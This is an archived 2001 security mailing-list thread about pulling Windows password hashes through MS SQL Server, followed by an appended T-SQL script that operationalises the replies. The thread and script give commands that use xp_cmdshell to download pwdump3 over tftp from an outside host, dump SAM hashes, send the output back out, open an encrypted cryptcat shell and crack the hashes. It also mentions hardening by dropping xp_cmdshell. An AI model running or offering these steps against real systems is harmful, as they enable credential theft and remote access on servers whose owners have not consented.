Re: [RE: MS SQL & NT registry]

From: Chip Andrews (chipandrews@usa.net)
Date: 11/01/01


Message-ID: <20011101173651.16699.qmail@cpdvg203.cms.usa.net>
Date:  1 Nov 2001 12:36:51 EST
From: Chip Andrews <chipandrews@usa.net>
To: focus-ms@securityfocus.com
Subject: Re: [RE: MS SQL & NT registry]

Erik, Thanks for the plug.

David,

Not sure if you're the same chap who asked me this question a while back but
the bottom line is that if you're really interested in grabbing the hashes
from the registry I would refer you to Jeremy Allison's original pwdump source
code at

http://www.insecure.org/sploits/WinNT.passwordhashes.deobfuscation.html

or pwdump3 source code (if the box is syskey'ed) at

http://packetstormsecurity.org/Crackers/NT/pwdump3.zip

You should be able to easily code your own de-obfuscator using this code which
basically does the same thing you are attempting. Barring that, Erik's
solution is also equally effective and doesn't require a compiler or c-coding
expertise.

Chip Andrews
www.sqlsecurity.com

Erik Birkholz <erik@foundstone.com> wrote:
> David,
>
> Why not use the xp_cmdshell procedure to run commands? (xp_cmdshell 'nasty
> command')
>
> If you are "sa" this will work, if not run 'sp_helprotect' to list
> permissions and find out if you have the correct permissions.
>
> Use these commands in the Query Analyzer. You said this is on your
> "private" LAN so sniffing shouldn't be an issue.
>
> tftp -i <ip> GET pwdump3.exe pwdump3.exe
> tftp -i <ip> GET lsaext.dll lsaext.dll
> tftp -i <ip> GET pwservice.exe pwservice.exe
> pwdump3 127.0.0.1 outfile.txt
> tftp <ip> PUT outfile.txt outfile.txt
> use John the Ripper (or l0pht) to crack
>
> If you need encryption, then upload cryptcat (nc.exe encrypted) and the
> pwdump3 files. Fire yourself an encrypted shell. Run the command from
> there (pwdump3 127.0.0.1). Grab the output from the cryptcat window and
> paste into a notepad. Then crack away.
>
> That should solve your problem.
>
> Also, tell them to remove the xp_cmdshell extended stored procedure. (use
> sp_dropextendedproc 'xp_cmdshell')
>
> Oh yea, tell them to read Chip's site, www.sqlsecurity.com
>
>
> --Erik B
>
>
>
> -----Original Message-----
> From: Lynum, David [mailto:David.Lynum@elancorp.com]
> Sent: Wednesday, October 31, 2001 12:57 PM
> To: focus-ms@securityfocus.com
> Subject: MS SQL & NT registry
>
>
> Hey there,
>
> This is first time I've posed a question to this list, so take it easy on
> me.
>
> My question has to do with a whitepaper I read from ISS.net on securing
> database servers, and here's the link to it,
> http://documents.iss.net/whitepapers/securingdbs.pdf. The paper shows how to
> use an extended stored procedure call, "xp_regread" to read registry
> contents for the SAM\Domains\Accounts section. But it doesn't tell you how
> to extract the query results so that a password cracking program such as
> L0phtcrack can be used to see the account information. My question is
> specifically about extracting the contents of the SAM registry entries from
> the SQL query results so that I can import them into L0phtcrack to crack
> them. How do I do this? I've saved the query report results to a file and
> then opened that file from within L0pht, but L0pht closes as soon as I do
> this. I e-mailed support for L0pht and they haven't gotten back to me. I
> have L0pht 2.52. Also, I spoke with one of the security people at ISS about
> this, but they won't provide any help.
>
> Have any of you done this, or know where I can find information on how to do
> this? I need to know because I handle data security for my company and I
> have to prove to them that this exploit is real before they'll take any
> action.
>
> Thanks in advance for your help,
>
> David
>
>
> --This communication and any files transmitted with it contain information
> which is confidential and may be privileged and exempt from disclosure under
> applicable law. It is intended solely for the use of the individual or
> entity to which it is addressed. If you are not the intended recipient, you
> are hereby notified that any use, dissemination or copying of this
> communication is strictly prohibited. If you have received this
> communication in error, please notify the sender. Thank you for your
> co-operation.--
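The steps Erik describes above, written out as a Query Analyzer script. This is an added example and not code from the original thread; <ip> and the file names are placeholders for the tftp server and pwdump3 files you stage yourself, and the privilege check uses IS_SRVROLEMEMBER, which is a standard T-SQL function (not something the thread mentions). On SQL Server 2000, xp_cmdshell runs the command as the SQL Server service account for sysadmin members; anyone else needs the proxy account configured, which is why the check comes first.

```sql
-- Added example (not from the original thread). Run in Query Analyzer.
-- <ip> is a placeholder for the tftp server you control.

-- 1. Are we effectively "sa"? 1 = member of sysadmin, 0 = not.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. If not sysadmin, see who has EXECUTE on the extended procedures involved.
USE master;
EXEC sp_helprotect 'xp_cmdshell';
EXEC sp_helprotect 'xp_regread';

-- 3. Erik's procedure, one command per xp_cmdshell call. Each call returns
--    the command's standard output as a result set, so the dump can be read
--    straight from the results grid instead of tftp'ing it back.
EXEC master..xp_cmdshell 'tftp -i <ip> GET pwdump3.exe pwdump3.exe';
EXEC master..xp_cmdshell 'tftp -i <ip> GET lsaext.dll lsaext.dll';
EXEC master..xp_cmdshell 'tftp -i <ip> GET pwservice.exe pwservice.exe';
EXEC master..xp_cmdshell 'pwdump3 127.0.0.1 outfile.txt';
EXEC master..xp_cmdshell 'type outfile.txt';   -- pwdump format, paste into the cracker
EXEC master..xp_cmdshell 'tftp <ip> PUT outfile.txt outfile.txt';   -- or send it back

-- 4. Hardening step from the reply: drop the extended procedure.
EXEC sp_dropextendedproc 'xp_cmdshell';
```

One caveat on step 4: sp_dropextendedproc only removes the registration. As long as xplog70.dll is still present in the SQL Server binn directory, a sysadmin can re-register it with sp_addextendedproc, so dropping the procedure is a deterrent rather than a boundary; the real fix is not running SQL Server as SYSTEM and keeping sysadmin membership to a minimum.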